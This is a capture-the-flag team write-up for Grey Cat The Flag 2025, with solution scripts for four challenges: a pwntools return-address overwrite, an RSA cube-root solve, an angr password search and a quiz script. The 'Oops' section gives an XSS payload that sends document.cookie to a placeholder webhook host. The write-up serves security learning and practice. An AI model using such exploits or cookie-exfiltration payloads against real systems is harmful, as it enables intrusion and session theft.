
Grey Cat The Flag 2025 - Ezpz challenges


Introduction

We solved all the IziPizi tasks ;) (4 of 4). They weren't that easy, but they were short and clever. More info about this CTF is here

izipizi


BABY BYTES

baby bytes

Solution author: kerszi

from pwn import *

# pwntools context: target architecture/OS and the terminal used for gdb splits
context.update(arch='x86_64', os='linux')
context.terminal = ['wt.exe', 'wsl.exe']
context.log_level = 'info'

# Remote endpoint and local binary

HOST = "challs.nusgreyhats.org:33021"
ADDRESS, PORT = HOST.split(":")  # PORT stays a str; pwntools' remote() converts it
BINARY_NAME = "./baby_bytes"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

# Run the binary locally by default; connect to the remote service when the
# script is started with the pwntools `REMOTE` command-line argument.
if args.REMOTE:
    p = remote(ADDRESS, PORT)
else:
    p = process(binary.path)

# Parse the two addresses the program prints at start-up
def get_addresses() -> tuple[int, int]:
    """Read the two addresses the challenge prints after its two prompts.

    Returns:
        ``(choice_addr, win_addr)``: the hex values following the
        "address of choice" and "call the function at this address" prompts.
    """
    p.recvuntil(b"Here's your address of choice (pun intended): ")
    # int(..., 16) accepts the "0x" prefix the program prints
    choice_addr = int(p.recvline().strip(), 16)
    p.recvuntil(b"You need to call the function at this address to win: ")
    win_addr = int(p.recvline().strip(), 16)
    return choice_addr, win_addr

# Collect the leaked addresses and log them
choice_addr, win_addr = get_addresses()
log.info(f"Choice address: {choice_addr:#x}")
log.info(f"Win address: {win_addr:#x}")

# The saved return address sits 28 bytes past the leaked address. The offset
# is challenge-specific (presumably read off the binary's stack frame) —
# re-check it if the binary changes.
ret_addr = choice_addr + 28

# Write one byte at the given address through the program's menu
def write_byte(addr: int, byte: int) -> None:
    """Use menu option 2 to store one byte at ``addr``.

    Args:
        addr: target address; sent as a hex string.
        byte: value 0..255 to store; sent as a hex string.
    """
    p.sendlineafter(b"> ", b"2")  # menu option 2: write a byte
    p.sendlineafter(b"Enter the address of the byte you want to write to in hex:", hex(addr).encode())
    p.sendlineafter(b"Enter the byte you want to change it to:", hex(byte).encode())
    log.info(f"Writing byte {hex(byte)} to address {hex(addr)}")

# Little-endian encoding of the win address: one byte per write
win_bytes = p64(win_addr)

# Overwrite the saved return address one byte at a time (8 bytes on x86_64)
for offset, value in enumerate(win_bytes):
    write_byte(ret_addr + offset, value)

# Menu option 3 leaves the loop, so the function returns through the
# overwritten address
p.sendlineafter(b"> ", b"3")

# Hand the session over to the user
p.interactive()

grey{d1D_y0u_3njoY_youR_b4bY_B1tes?}

Tung Tung Tung Sahur

tung_tung_tung_sahur

Solution author: ppp45

from sympy import integer_nthroot

N = 140435453730354645791411355194663476189925572822633969369789174462118371271596760636019139860253031574578527741964265651042308868891445943157297334529542262978581980510561588647737777257782808189452048059686839526183098369088517967034275028064545393619471943508597642789736561111876518966375338087811587061841
C = 49352042282005059128581014505726171900605591297613623345867441621895112187636996726631442703018174634451487011943207283077132380966236199654225908444639768747819586037837300977718224328851698492514071424157020166404634418443047079321427635477610768472595631700807761956649004094995037741924081602353532946351
e = 3

# Adding N back and dropping the low 164 bits appears to undo the challenge's
# transformation of m**e (one modular wrap and a 2**164 scaling); the exact
# root check below confirms the guess. For non-negative ints, >> 164 equals
# // 2**164.
c = (C + N) >> 164

pt, exact = integer_nthroot(c, e)
assert exact  # recovery only makes sense if the e-th root is exact

flag = pt.to_bytes(99)  # big-endian (default byteorder since Python 3.11)
print(flag)

grey{tUn9_t00nG_t0ONg_x7_th3n_s4hUr}

Reversing 101

reversing101

Solution author: kerszi

First, find the password... Angr is your best friend.

import angr
import sys

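def main(argv):
  """Symbolically explore the challenge binary and print the stdin that reaches
  the success message.

  Args:
    argv: command-line arguments; ``argv[1]``, when given, overrides the
      default binary path ``'chal2'``.

  Raises:
    RuntimeError: if exploration finishes without reaching the success message.
  """
  path_to_binary = argv[1] if len(argv) > 1 else 'chal2'
  project = angr.Project(path_to_binary)
  initial_state = project.factory.entry_state()
  simulation = project.factory.simgr(initial_state)

  def stdout_so_far(state):
    # Everything the program has written to stdout along this path
    return state.posix.dumps(sys.stdout.fileno())

  def is_successful(state):
    # Goal: the path that prints the "correct password" banner
    return b'correct password! answer the quiz to get the flag.' in stdout_so_far(state)

  def should_abort(state):
    # Prune paths that already printed the failure message
    return b'incorrect password. try again.' in stdout_so_far(state)

  simulation.explore(find=is_successful, avoid=should_abort)

  if not simulation.found:
    raise RuntimeError('Could not find the solution')
  solution_state = simulation.found[0]
  # The concretized stdin of the found path is the input that was accepted
  print(solution_state.posix.dumps(sys.stdin.fileno()))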

# Run only when executed as a script, not when imported
if __name__ == '__main__':
  main(sys.argv)

Answer the quiz

from pwn import *             

# pwntools context: target architecture/OS and the terminal used for gdb splits
context.update(arch='x86_64', os='linux')
context.terminal = ['wt.exe','wsl.exe']

# Connection string in `nc host port` form; keep only host and port
HOST="nc challs.nusgreyhats.org 33000"
ADDRESS,PORT=HOST.split()[1:]


BINARY_NAME="./chal"
binary = context.binary = ELF(BINARY_NAME, checksec=False)

p = remote(ADDRESS,PORT)

# Quiz answers are specific to this challenge binary (presumably recovered
# while reversing it); each is sent verbatim after its "Question N:" prompt.
p.sendlineafter(b"Question 1:",b'0x402db6')
p.sendlineafter(b"Question 2:",b'strlen')
p.sendlineafter(b"Question 3:",b'15')
p.sendlineafter(b"Question 4:",b"0xc1de1494171d9e2f")
p.sendlineafter(b"Question 5:",b"rc4")
p.sendlineafter(b"Question 6:",b"honk-mimimimimi")
# Hand the session over to the user once the quiz is answered
p.interactive()

grey{solv3d_m1_f1r5t_r3v_ch4lleng3_heh3}

Oops

oops

Solution author: rvr

Just put the following XSS payload into the URL Shortener form, shorten it, and report it.

javascript:fetch(`//<WEBHOOK.URL>?a=${document.cookie}`)
oops-webpage

grey{oops_wrong_variable}